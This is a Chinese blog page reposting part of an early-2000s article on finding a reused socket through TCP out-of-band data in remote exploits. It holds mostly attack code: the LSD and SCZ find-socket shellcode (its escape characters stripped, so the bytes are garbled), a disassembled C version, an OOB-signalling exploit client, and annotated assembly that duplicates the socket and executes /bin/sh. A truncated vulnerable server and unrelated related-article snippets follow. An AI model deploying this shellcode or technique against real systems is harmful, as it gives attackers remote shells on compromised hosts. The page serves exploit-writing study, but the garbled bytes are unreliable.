linux socket msg oob,利用OOB查找socket 下

最新推荐文章于 2022-02-19 12:26:08 发布
最新推荐文章于 2022-02-19 12:26:08 发布
阅读量362 收藏
点赞数
文章标签: linux socket msg oob

客户端:

[bkbll@mobile ownprog]$ ./clientfd

Connecting ....ok

send OOB.......ok

sh-2.05b$ id

uid=500(bkbll) gid=500(bkbll) groups=500(bkbll)

sh-2.05b$

同样可行.

[5] LSD和 scz算法实现

A. LSD C语言算法:

/* From asmcode-1.0.2.pdf downding from lsd-pl.net */

j=sizeof(sockaddr_in);

for(i=256;i>=0;i--){

if(getpeername(sck,&adr,&j)==-1) continue; //这里有一个问题,sck应该是i

if(*((unsigned short)&(adr[2]))==htons(port)) break;

}

for(j=2;j>=0;j--) dup2(j,i);

B. LSD的汇编算法和shllcode

(注意:这里仅仅是find sckcode,并没有dup2和exece等操作):

char findsckcode[]= /* 72 bytes */

"x31xdb" /* xorl %ebx,%ebx */

"x89xe7" /* movl %esp,%edi */

"x8dx77x10" /* leal 0x10(%edi),%esi */

"x89x77x04" /* movl %esi,0x4(%edi) */

"x8dx4fx20" /* leal 0x20(%edi),%ecx */

"x89x4fx08" /* movl %ecx,0x8(%edi) */

"xb3x10" /* movb $0x10,%bl */

"x89x19" /* movl %ebx,(%ecx) */

"x31xc9" /* xorl %ecx,%ecx */

"xb1xff" /* movb $0xff,%cl */

"x89x0f" /* movl %ecx,(%edi) */

"x51" /* pushl %ecx */

"x31xc0" /* xorl %eax,%eax */

"xb0x66" /* movb $0x66,%al */

"xb3x07" /* movb $0x07,%bl */

"x89xf9" /* movl %edi,%ecx */

"xcdx80" /* int $0x80 */

"x59" /* popl %ecx */

"x31xdb" /* xorl %ebx,%ebx */

"x39xd8" /* cmpl %ebx,%eax */

"x75x0a" /* jne */

"x66xb8x12x34" /* movw $0x1234,%bx */

"x66x39x46x02" /* cmpw %bx,0x2(%esi) */

"x74x02" /* je */

"xe2xe0" /* loop */

"x89xcb" /* movl %ecx,%ebx */

"x31xc9" /* xorl %ecx,%ecx */

"xb1x03" /* movb $0x03,%cl */

"x31xc0" /* xorl %eax,%eax */

"xb0x3f" /* movb $0x3f,%al */

"x49" /* decl %ecx */

"xcdx80" /* int $0x80 */

"x41" /* incl %ecx */

"xe2xf6" /* loop */

C. SCZ的shellcode:

From: http://bbs.nsfocus.net/index.php?act=SE&;f=2&t=

144419&p=174118&hl=shellcode

unsigned char remote_shellcode[] =

"xebx57x5fx31xc0x40x89x47"

"x08x31xd2x8dx4fx08x31xdb"

"xb3x0dx04x42xcdx80x31xc9"

"xb5x04x89xcbx51x31xc9xb1"

"x03x31xd2x31xc0xb0x37xcd"

"x80x89xc6x89xc2x80xcex08"

"x41x31xc0xb0x37xcdx80x89"

"xcax8dx4fx08x89xd0x48xcd"

"x80x89xd1x89xf2x31xc0xb0"

"x37xcdx80x59x81x7fx08x4e"

"x53x46x4fx74x06xe2xc3xeb"

"xbdxebx33x31xc9x31xc0xb0"

"x3fxcdx80x41x31xc0xb0x3f"

"xcdx80x41x31xc0xb0x3fxcd"

"x80x89xfbx89x5fx08x31xc0"

"x89x47x0cx88x47x07x31xd2"

"x8dx4fx08xb0x0bxcdx80x31"

"xdbx89xd8x40xcdx80xe8x6f"

"xffxffxffx2fx62x69x6ex2f"

"x73x68;

D. 反汇编得到C算法如下:

int i,k,j;

char buffer[5];

signal(SIGUSR2,SIG_IGN,NULL);

while(1)

{

for(i=4;i>0;i--)

{

j=fcntl(i,GETFL,NULL);

k=j;

j|=0x08;

fcntl(i,SETFL,j);

read(i,buffer,4);

fcntl(i,SETFL,k);

if(strncmp(buffer,"NSFO",4)==0) break;

}

if(i>0) break;

}

dup2(i,0);

dup2(i,1);

dup2(i,2);

execl("/bin/sh","/bin/sh",NULL);

exit(0);

[5] 附录程序

A. 上面利用的client程序:

/* use OOB to identify itself the client socket */

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#define BUF 1024

main()

{

int port=5555; // connect port

char server[]="192.168.8.114";

int sockfd,on=1;

struct sockaddr_in client;

struct hostent *host;

int i,k,count;

int data1=0,data2=0;

fd_set fds;

char buffer[BUF];

memset(&client,0,sizeof(client));

sockfd=socket(AF_INET,SOCK_STREAM,0); //create socket

/* fill the client struct */

client.sin_port=htons(port);

client.sin_family=AF_INET;

host=gethostbyname(server);

client.sin_addr=*((struct in_addr *)host->h_addr);

printf("Connecting ....");

fflush(stdout);

if(connect(sockfd,(struct sockaddr *)&client,sizeof(struct sockaddr))<0)

{

perror("error");

close(sockfd);

return(0);

}

printf("ok ");

data1='I';

printf("send OOB.......");

fflush(stdout);

if(send(sockfd,&data1,1,MSG_OOB)<1)

{

perror("error");

close(sockfd);

return(0);

}

printf("ok ");

while(1)

{

FD_ZERO(&fds);

FD_SET(0, &fds);

FD_SET(sockfd, &fds);

if (select(sockfd+1, &fds, NULL, NULL, NULL) < 0)

{

if (errno == EINTR) continue;

break;

}

if (FD_ISSET(0, &fds))

{

count = read(0, buffer, BUF);

if (count <= 0) break;

if (write(sockfd, buffer, count) <= 0) break;

memset(buffer,0,BUF);

}

if (FD_ISSET(sockfd, &fds))

{

count = read(sockfd, buffer, BUF);

if (count <= 0) break;

if (write(1, buffer, count) <= 0) break;

memset(buffer,0,BUF);

}

}

close(sockfd);

}

B. OOB 程序的汇编注释

/* find code asm */

/* sleep(1)*/

.text

.globl _start

_start:

xorl %eax,%eax

pushl %eax

incl %eax

pushl %eax

movl %esp,%ebx

xorl %ecx,%ecx

movb $0xa2,%al

int $0x80

movb $0x09,%cl

movl %ecx,%eax /*

subl $0x0a,%eax /* eax=edi-10 */

notl %eax /* eax=~eax */

incl %eax /* eax+1 */

movl %eax,%edi

xorl %eax,%eax

incl %eax

decl %esp

movl %esp,%edx /* 存放OOB 数据的地方 */

pushl %eax /* 1 */

pushl %eax /* 1 */

pushl %edx /* &data*/

pushl %edi /* 判断的句柄 */

pushl %ecx /* ecx 入栈 */

leal 4(%esp),%ecx /* socketcall 的arg*/

xorl %ebx,%ebx

movb $0x0a,%bl /* 调用recv */

movb $0x66,%al /* socketcall 调用 */

int $0x80

popl %ecx /* ecx 出栈 */

cmpl $0x01,%eax

jne .+0x07 /* 不相等直接跳转到loop */

/* 相等判断是否位'I' */

cmpb $0x49,(%edx)

je .+0xb /* 相等则直接跳转到dup2这里 */

loop .-0x2c /* 循环 */

xorl %eax,%eax

incl %eax

movl %eax,%ebx

int $0x80 /* 没有找到,退出 */

/* 这里开始dup2 了 */

movl %edi,%ebx

movb $0x03,%cl

movb $0x3f,%al

decl %ecx

int $0x80

incl %ecx

loop .-0x06

/* 开始execve("/bin//sh",argv,NULL) */

pushl %ecx /* argv的NULL */

pushl $0x68732f6e /* n/sh */

pushl $0x69622f2f /* //bi */

movl %esp,%ebx

pushl %ecx

pushl $0x706c692d /* -ilp */

movl %esp,%edx

pushl %ecx

pushl %edx

pushl %ebx

movl %esp,%ecx /* 构造argv */

xorl %edx,%edx /* argenv=NULL */

xorl %eax,%eax

movb $0x0b,%al /* execve 调用 */

int $0x80

C. 一个漏洞程序和用了这个OOB shellcode的exploit

/* vuln.c */

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

int ptdata(char *buff);

main()

{

int port=5555; // bind port

int sockfd,clifd,on=1;

struct sockaddr_in server,client;

int i,k,flag;

int data=0;

char buffer[1024];

memset(&server,0,sizeof(server));

memset(&client,0,sizeof(client));

sockfd=socket(AF_INET,SOCK_STREAM,0); //create socket

/* fill the server struct */

server.sin_port=htons(port);

server.sin_family=AF_INET;

server.sin_addr.s_addr=htonl(INADDR_ANY);

/* set socket can bind again */

setsockopt(sockfd,SOL_SOCKET,SO_REUSEADDR,&on,sizeof(on));

printf("Listening ....");

fflush(stdout);

if(bind(sockfd,(struct sockaddr *)&server,sizeof(struct sockaddr))<0)

{

perror("Bind");

close(sockfd);

return(0);

}

listen(sockfd,1);

printf("ok ");

while(1)

{

i=sizeof(client);

clifd=accept(sockfd,(struct sockaddr *)&client,&i);

printf("=========================

亿恩科技地址(ADD):郑州市黄河路129号天一大厦608室 邮编(ZIP):450008 传真(FAX):0371-60123888

联系:亿恩小凡

QQ:89317007

电话:0371-63322206

本文出自:亿恩科技【www.enkj.com】

核桃英语
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
数据读写flags选项的使用-MSG_OOB
qq_43807092的博客
10-04 367
客户端代码 #include <iostream> #include <cstring> #include <cassert> #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <sys/types.h> #include <sys/socket.h> #include <arpa/inet.h> #include
Linux Socket Programming
10-30
而在`send()`和`recv()`中,可以使用MSG_OOB处理带外数据,或使用MSG_DONTWAIT进行非阻塞操作。 7. **多路复用I/O**:`select()`, `poll()`和`epoll`是Linux提供的多路复用I/O机制,允许程序同时监控多个套接字的...
MSG_OOB winsock
weixin_34113237的博客
12-21 199
unix中的msg_oob msg_oob in unixcwin下没有unix中的信号, MSG_OOB的解决方式是 使用select 中的异常套接字: exceptfds 关于oob 的解释都在另一篇文章中了.这里不再解释, 仅仅是windows实现 oob_recv.c // oob_recv.cpp : Defines the e...
MSG_OOB unixc
weixin_34037515的博客
12-21 255
MSG_OOB : 仅仅是通过tcp头的urgent 模式传送的, 且只会读取一个字节作为oob数据 例如:send(sockfd,"1234",strlen("1234"),MSG_OOB); 只有最后一个字节:4 ...
linux socket msg oob,Linux Socket
weixin_33289151的博客
05-15 131
0x0000 Linux Socket 函数bindlistenconnectacceptsendrecvreadwrite0x0001Server绑不上ip报错位置在bind函数[root@localhost 01]# ./server 191.168.80.151 1588191.168.80.151 : 1588Bind: Cannot assign requested addresspor...
Linux(程序设计):47---recv、send实现带外数据的读写(MSG_OOB选项)
董哥的黑板报
11-09 1118
一、带外数据 有些传输层协议具有带外(Out Of Band,OOB)数据的概念,用于迅速通告对方本端发生的重要事件。因此,带外数据比普通数据(也称为带内数据)有更高的优先级,它应该总是立即被发送,而不论发送缓冲区中是否有排队等待发送的普通数据。带外数据的传输可以使用一条独立的传输层连接,也可以映射到传输普通数据的连接中 实际应用中,带外数据的使用很少见,已知的仅有telnet、ftp等远程非...
C语言中经socket接收数据的相关函数详解
09-03
- `MSG_OOB`:接收带外数据(紧急数据)。 - `MSG_PEEK`:查看数据而不删除,下一次recv()调用仍能获取相同数据。 - `MSG_WAITALL`:等待接收完整`len`长度的数据,除非出现错误或信号。 - `MSG_NOSIGNAL`:阻止...
socket编程.pptx
02-28
Linux环境下,Socket编程是实现网络编程的重要工具之一。 #### 二、Socket编程架构与函数介绍 - **体系结构**:Socket编程通常基于TCP/IP协议栈,该协议栈包括多个层次,每一层都有其特定的功能。在网络编程中,...
linux网络编程socket介绍.docx
09-26
sockfd是已连接的套接字描述符,buf是数据缓冲区的指针,len是待发送数据的长度,flags可以设置一些发送选项,如MSG_OOB(发送带外数据)或MSG_DONTROUTE(不使用路由发送数据)。send函数会尽可能发送len长度的数据...
MSG_OOB MSG_PEEK
llzhang_fly的博客
02-19 1342
本文章向大家介绍一个例子说明 MSG_OOB MSG_PEEK MSG_DONTWAIT,主要包括一个例子说明 MSG_OOB MSG_PEEK MSG_DONTWAIT使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。 此类数据通过信号SIGURG 来通知,所以需要使用 signal / sigaction 来注册一个信号处理函数, 在signal 之前首先需要 fcntl(clientfd,F_SETOWN,getpid()) ,由于此信号是由套接字产生的,
linux平台MSG_OOB选项测试
qq_38158479的博客
07-07 476
//客户端 #include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <string.h> #include <sys/socket.h> #include <arpa/inet.h> #define BUF_SIZE 30 void error_handling(char *message); int main(int argc, char *argv[
利用OOB查找socket
爱.NET
05-29 224
利用OOB查找socketbkbll(bkbll@cnhonker.net)2003-7-25[1]. 前言在*nix系统中, 在远程溢出程序或者漏洞利用程序(exploit)中, 一般的shellcode根据应用的不同可以分为几类:a. 绑定一个端口b. 创建一个反连接c. 执行某个命令,比如xterm, iptables(ipchains) -L等d. 操作文件,比如添加一个空口令用户到/et...
TCP 用select 监听带外数据(MSG_OOB)
xianxjm的博客
09-06 922
select 监听带外数据时,OOB数据会出现在exceptionSet中,但是如果设置了SO_OOBINLINE,OOB数据会出现在readSet中。         OOB消息不会因为流量控制而影响它的传输,但是带外数据会。如果在select中用exceptionSet去监听OOB_data,只有等到带外数据到了,才会触发select exceptionSet 返回。这样实际上丢失带了OO
MSG_OOB 带内带外消息
fysy0000的专栏
08-10 7834
带外数据标记。 现在进程使用以MSG_OOB 为参数的send()函数写入一个单字节的"带外数据",包 含一个ASCII 字符"a": send(fd, “a”, 1, MSG_OOB); TCP 将数据放在下一个可用的发送缓冲区中,并设置这个连接的"紧急指针"(ur
TCP带外数据(URG,MSG_OOB
ordeder的专栏
01-28 1万+
为何不直接将一个字节的紧急数据放在紧急指针哪里呢? 答:因为TCP数据包在ip层可能被拆包,成为多个数据段。一个包含紧急数据的数据包被拆成两个数据包,那么这两个包有的tcp头部有相同的紧急指针(和UGR)。如果将紧急数据直接放在紧急指针的内存处,那么将多出一个紧急数据!所以,不该将紧急数据放在TCP头部。 同时,在拆包后,对端将收到两个包,第一个包到达的时候就知道了UGR和紧急指针。如果紧急指针所指的位置已在该包的数据段中,那么紧急数据就到达了。否则,要等到第二个包到达的时候,才能去得到紧
Linux高级编程复习 第十一章 select TCP编程模型_Socket选项_OOB_HTTP协议
学峰的学习笔记
05-24 623
待续
C++学习:第六章Linux高级编程 - (十一)select、TCP编程模型、Socket选项、OOB、HTTP协议
Thomas会写字
10-28 265
回顾: 多进程的问题:数据共享。 多进程的问题:进程的上下文环境(context) 文件描述符号是整数以及对应上下文环境 多进程的问题:上下文环境共享 SELECT TCP服务器编程模式 select函数 int select( int fds, //建议是监控的文件描述符号的最大值+1 fd_set *readfds, //读文件描述符号集合 //该参数既是输入,也是输出 //输入:被监控的描述符号 //输出:有数据的描述符号 fd_set *writefds, //写描述符 .
socket网络编程(2):socket操作相关函数
milanleon的专栏
07-19 2806
1、setsockopt()可以用来设置接收、发送超时 int TimeOut=30000;//设置接收超时30秒 if(setsockopt(m_SocketClientCommand,SOL_SOCKET,SO_RCVTIMEO,(char *)&TimeOut,sizeof(TimeOut))==SOCKET_ERROR) AfxMessageBox(_T("setso
C++ Socket编程(二) send与recv 缓冲区与阻塞
热门推荐
yangkunqiankun的博客
07-23 1万+
socket缓冲区每一个socket在被创建之后,系统都会给它分配两个缓冲区,即输入缓冲区和输出缓冲区。 send函数并不是直接将数据传输到网络中,而是负责将数据写入输出缓冲区,数据从输出缓冲区发送到目标主机是由TCP协议完成的。数据写入到输出缓冲区之后,send函数就可以返回了,数据是否发送出去,是否发送成功,何时到达目标主机,都不由它负责了,而是由协议负责。recv函数也是一样的,它并不是直
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值